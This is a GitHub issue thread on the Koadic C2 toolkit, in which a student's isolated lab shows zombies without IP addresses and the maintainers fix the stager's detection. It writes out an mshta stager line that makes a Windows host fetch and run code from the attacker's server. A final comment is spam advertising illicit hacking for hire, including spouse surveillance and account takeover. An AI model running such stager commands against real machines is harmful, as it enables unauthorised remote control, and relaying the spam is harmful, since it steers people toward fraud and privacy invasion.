### ISSUE TITLE
Why does the zombies command display a zombie with no IP address?

### ISSUE THREAD

**Issue by Calson23** [zerosum0x0/koadic#60]
Hello,
I am using the Koadic program to display the idea of botnets and their effect on computer on a network for a Final project. However, I am having an issue in regards to testing the Koadic program on a virtual environment I created using Proxmox. I setup the environment to use an attacking VM called KaliAttack (using Kali Linux), a router VM (using CentOS 7), two Windows VMs (both Using Windows 7). The Kali attack VM is setup on the outside (external interface) of the Router VM and both of the Windows VMs are setup on the inside (internal interface) of the Router VM. The router VM has two port forwards on port 9998 on the external interface to the internal interface to each Windows VM through the Router VM. I then went into the Koadic program using "./koadic" command inside the home directory of koadic then used the use then used the "verbose 1" command to turn on verbose info mode. The i used the "use stager/js/mshta" to select the stager that i want to use for the zombies to connect to. i then use the "info" command to see the populated values for the stager. I made the stager use the following values:
SRVHOST = 172.16.242.82
SRVPORT = 9998
EXPIRES = 
KEYPATH =
CERTPATH =
MODULE =
The next thing i did was used the "run" command to run the mshta module and it gave me this:
![image](https://user-images.githubusercontent.com/44244859/47117524-9a140080-d232-11e8-8642-4cf9a4e849a1.png)
Then I used the "zombies" command to check to make sure there are no zombies in the module from past failed attempts. It shown the following:
![image](https://user-images.githubusercontent.com/44244859/47117719-2d4d3600-d233-11e8-9e0a-8e7ff5f0e2af.png)
I then go to my first Windows VM and go into command prompt and use the command after the denoted "[>]" prefix in the first screenshot. The following is the result in the koadic program after the command mentioned previously was entered into the command prompt of the Windows VM:
![image](https://user-images.githubusercontent.com/44244859/47118073-37bbff80-d234-11e8-9943-8a476dcd29b8.png)
However, when I use the "zombies" command it shows the following as a result:
![image](https://user-images.githubusercontent.com/44244859/47118152-76ea5080-d234-11e8-9f7a-d0129b969f0e.png)
I even went and tried seeing the info of the zombie in greater detail using the "zombies 0" command which gives me the following result:
![image](https://user-images.githubusercontent.com/44244859/47118260-c16bcd00-d234-11e8-8a0c-aafa81481996.png)
It's not supplying the IP address of the zombie that I connected. I'm not sure what is wrong. Please help me.

Thank you,

Calson

**Comment by TheNaterz** [comment]
Yeah I noticed that this morning. I added some functionality in the stdlib to try and pull a Zombie's IP address and have that assigned to the Zombie instead of the IP of the original callback. Can you try pulling and trying again?

**Comment by Calson23** [comment]
So re-downloading and installing the Koadic program and then setting it up again? Sorry it's my first time using GitHub.

**Comment by TheNaterz** [comment]
Yes, try doing that and let me know if the issue has been resolved.

**Comment by Calson23** [comment]
also I've been using this link to download and installing steps for downloading and installing koadic: https://null-byte.wonderhowto.com/how-to/use-koadic-command-control-remote-access-toolkit-for-windows-post-exploitation-0181742/
Is this still the same way to download and install koadic as well?

**Comment by Calson23** [comment]
Ok i did the same steps and got the following:
After using the command on the Windows VM's command prompt to connect to the KaliAttack VM:
![image](https://user-images.githubusercontent.com/44244859/47121847-52957080-d242-11e8-9be0-206572138237.png)
The next screenshot is the result after using the "zombies" command:
![image](https://user-images.githubusercontent.com/44244859/47121884-7f498800-d242-11e8-96b3-ff9f4e519dde.png)
Just to make sure that the fix makes the details work on the zombie 0, i used the "zombies 0" command and the following are the results:
![image](https://user-images.githubusercontent.com/44244859/47121980-d6e7f380-d242-11e8-91dc-742ff7f5592b.png)
Does this look right?

**Comment by zerosum0x0** [comment]
Looks good to me.

**Comment by Calson23** [comment]
well it says the IP address of the stager that im using and not the IPaddress of the zombie computer. Isn't that supposed it supposed to give the IP Address of the victim computer?

**Comment by TheNaterz** [comment]
Ah I think I see the problem now.
https://github.com/zerosum0x0/koadic/blob/master/data/stager/js/stdlib.js#L234-L253

Line 240 is starting the index at 1 buuuut it should probably start at 0. Let me run some tests to confirm.

**Comment by zerosum0x0** [comment]
I'm getting proper output with fresh git pull. Could be something weird with the routes?

```
[>] mshta http://10.0.0.249:9999/xSMnl
[+] Zombie 0: Staging new connection (10.0.0.194)
[+] Zombie 0: DESKTOP-FG2E4ZZ\nobody @ DESKTOP-FG2E4ZZ -- Windows 10 Pro
```

**Comment by zerosum0x0** [comment]
Great message on the git blame tho

![image](https://user-images.githubusercontent.com/3971576/47122857-e3198400-d235-11e8-9490-d14dd8b7bb49.png)

**Comment by Calson23** [comment]
I don't know if this helps you guys out but i got this after a little bit of leaving the program alone:
![image](https://user-images.githubusercontent.com/44244859/47122917-dd786a00-d246-11e8-879a-3df645e881c3.png)

**Comment by TheNaterz** [comment]
@zerosum0x0 ¯\_(ツ)_/¯

**Comment by TheNaterz** [comment]
Try pulling now, I made another adjustment. One of the issues of pulling IP from registry is that I can't see anything obvious that indicates a primary IP. I really don't want to have to parse ipconfig, but I'll keep looking in reg. For now @Calson23, you should be good to go now. We weren't indexing from 0 which is why the target IP wasn't showing up. As a fallback for when we can't get an IP, we just set it to the connecting IP which is why you see what you see now.

**Comment by Calson23** [comment]
ok I did another clean install and I get the same issue:
![image](https://user-images.githubusercontent.com/44244859/47124770-a194d300-d24d-11e8-8698-ed4171866b45.png)
What makes the parsing of ipconfig difficult in Python? I found this if this could help:
https://stackoverflow.com/questions/41420165/get-ipconfig-result-with-python-in-windows
Does the program run entirely in the RAM or does it store temp files for instance based uses?

**Comment by TheNaterz** [comment]
Well that sucks, I'm not sure what the problem is then. Can you dig around HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\interfaces in the registry in that VM? The IP address should be in there. If you find it, can you tell me what key it's under? It should be in either DhcpIPAddress or IPAddress.

It's not that parsing the ipconfig is difficult, it's the fact that we'd have to run another shell command on the target before establishing a full connection. I'd like to avoid that if we can. Also, on the targets, we're not running Python, we're using JScript. Yes, everything is in RAM, there are no instances.

**Comment by TheNaterz** [comment]
Yes, it's under HKEY_LOCAL_MACHINE and then SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\interfaces.

**Comment by Calson23** [comment]
ah ok so here is the values inside it:
![image](https://user-images.githubusercontent.com/44244859/47125890-d146d980-d253-11e8-9d3e-ddd6fbea7c04.png)
The IP Address of the this Windows VM is "192.168.10.25".

**Comment by TheNaterz** [comment]
Yep, nailed it. Give me just a second and I'll get the proper fix pushed.

**Comment by TheNaterz** [comment]
Alright @Calson23, give it one more shot. If there's still an issue, I'll get around to it tomorrow.

**Comment by Calson23** [comment]
Ok it is given me the same results that are as follows:
![image](https://user-images.githubusercontent.com/44244859/47126478-c2155b00-d256-11e8-9661-cf20cb9aabb7.png)
Also just to confirm since im still not sure if i am downloading it correctly. I use the following commands to download and install Koadic:
1. git clone https://github.com/zerosum0x0/koadic
2. cd koadic/
3. pip install -r requirements.txt
Then I use the "./koadic" command to launch it. is this the same method that you used to download and install it?

**Comment by TheNaterz** [comment]
Alright, I'll figure out what the issue is tomorrow then. We might just run ipconfig, but that's ok.

Yes that's the correct way. Once you have a repo cloned, you can just run 'git pull' and it will update everything.

**Comment by TheNaterz** [comment]
Psych, we're just parsing ipconfig now. Way less of a hassle and more reliable. If there are still issues, idk just fix it and make a pull.

YOLO

**Comment by Calson23** [comment]
ooooooooooo I think you got it @TheNaterz its giving me the following now:
![image](https://user-images.githubusercontent.com/44244859/47127860-dd836480-d25c-11e8-9047-ac73f61d6699.png)
and here is the result of using the "zombies 0" command:
![image](https://user-images.githubusercontent.com/44244859/47127899-0efc3000-d25d-11e8-9cf9-e93f82f4a65c.png)

**Comment by Calson23** [comment]
I then used the same on my second Windows VM and it shows a different but correct IP address now here are the results:
![image](https://user-images.githubusercontent.com/44244859/47128038-abbecd80-d25d-11e8-91cd-64330a427d19.png)

![image](https://user-images.githubusercontent.com/44244859/47128053-bda07080-d25d-11e8-8136-821cd5fbe08a.png)

![image](https://user-images.githubusercontent.com/44244859/47128067-d446c780-d25d-11e8-88e9-b73a398ed8a7.png)

Considering these results I think the issue was corrected since it was able to give the correct IP address of the zombie computer. Awesome job @TheNaterz.

**Comment by Jeni223344** [comment]
I strongly recommend the service of a GREAT Hacker to you and his email is wisetechhacker@gmail.com OR whatsapp him +1{917}5085328
 I have used him quite a number of times and he has never disappointed me. He does all types of mobile hacks, get unrestricted and unnoticeable access to your Partner/Spouse, Skype, Facebook Account, Email(s), Whatsapp, Bitcoin recovery, Instagram, Text messages, In coming and Out going calls, Twitter, Snap Chats, Bank accounts, Viber, Deleted files, Emails and Password etc. He can also help you boost or repair your credit score and also clear all debts on your card(s). Getting the job done is as simple as sending an email to wisetechhacker@gmail.com stating what you want to do
